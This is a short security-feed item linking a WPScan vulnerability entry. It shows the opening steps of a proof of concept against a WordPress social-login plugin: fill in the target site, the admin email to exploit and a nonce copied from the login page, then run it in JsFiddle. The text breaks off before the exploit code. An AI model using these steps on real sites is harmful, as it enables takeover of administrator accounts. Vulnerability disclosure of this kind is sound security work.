https://wpvulndb.com/vulnerabilities/9043
Proof of Concept// Steps: // Fill this 3 variable var url = ‘http://my-site.com/wordpress/’, //website url. Closing slash required email = ‘john.doe@my-site.com’, //The admin email address to exploit nonce = ‘e86377d05a’; // View the source of the login page: http://my-site.com/wordpress/wp-login.php and search for `security`. copy here the nonce value Ex.: var the_champ_sl_ajax_token = {“ajax_url”:”http://my-site.com/wordpress/wp-admin/admin-ajax.php”,”security”:”e86377d05a”}; // Click on Run in JsFiddle and
Source: Security Feed